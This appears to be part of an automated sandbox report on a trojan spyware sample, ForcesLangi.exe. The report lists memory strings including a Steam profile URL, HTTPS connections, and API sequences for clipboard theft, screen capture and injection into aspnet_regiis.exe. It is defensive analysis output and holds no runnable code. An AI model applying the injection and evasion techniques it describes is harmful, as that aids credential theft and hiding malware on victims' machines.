                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknown HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00753E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007548C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt

                System Summary

                Source: ForcesLangi.exe, GetWin.cs Large array initialization: GetWindowsOS: array initializer size 649728
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE04270 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,NtCreateThreadEx
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE02F70 GetModuleHandleW,NtQueryInformationProcess
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CDFD160
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE04270
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE02F70
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE130E0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1D0C0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE208C0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE29CC0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1E8D0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE174D0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE138D0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CDFC480
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE12060
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE17860
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE2C060
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE23C50
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE2B050
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE12420
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CDF1010
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE25430
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE18000
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE24C00
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE0EDF0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1D5F0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE2C9C0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE269C0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE12D80
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE26580
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE11990
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE14D60
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1C970
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE16970
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE16540
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE0C950
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE22130
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE10900
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE29500
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE2D900
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE27100
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE20D10
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE28D10
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE0F2E0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1FEE0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE0DED0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1A6D0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE11260
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CDFCE50
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE15670
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE19A20
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE2B620
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE03E30
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE15E30
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE15210
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE00FC0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE193C0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE2CFC0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1C3D0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1DBD0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1B7A0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE0E7B0
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1E380
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE1A390
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE12760
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CDF7370
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE27F20
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE25B20
                Source: C:\Users\user\Desktop\ForcesLangi.exe Code function: 0_2_6CE23720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072B100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00731227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00759280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074D34A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00760460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00747440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00760D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00741D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075C5A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00728600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00758EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072E687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007357C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072C840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072D83C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072D021
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073D003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074C0E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007360E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007538D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007238C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074A0CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007588B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00726160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073E960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00746910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00725900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007609E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074C9EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007481CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007439B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007491AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074E180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00724270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075CA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075DA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00755A4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073E220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00739AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007442D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00748ABC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00759A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074F377
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00741340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075FB28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075FB2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00729310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075FB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007273D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007483D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072F3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00724BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073EB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075A440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00753C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072D4F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00751CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007424E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007404C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00734CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075FD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00744560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074CD5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074CD4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00759D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074C53C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00731D2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00746D2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007265F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075A5D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00757DA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074FE74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0074EE63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00740E6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00742E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00758650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073E630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073961B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0075FE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0072F60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007606F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_007446D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00722EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073AEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00736F52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00732750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0073DF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00747740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00749739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00745F1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00729780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 00727F60 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 00734C90 appears 77 times
                Source: ForcesLangi.exe, 00000000.00000000.1644466778.0000000000774000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIsabellaHarveyViolet.exeyaRT vs ForcesLangi.exe
                Source: ForcesLangi.exe, 00000000.00000002.1650307866.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ForcesLangi.exe
                Source: ForcesLangi.exe Binary or memory string: OriginalFilenameIsabellaHarveyViolet.exeyaRT vs ForcesLangi.exe
                Source: ForcesLangi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@11/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_00759280 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                Source: C:\Users\user\Desktop\ForcesLangi.exe File created: C:\Users\user\AppData\Roaming\gdi32.dll
                Source: C:\Users\user\Desktop\ForcesLangi.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
                Source: ForcesLangi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ForcesLangi.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\ForcesLangi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
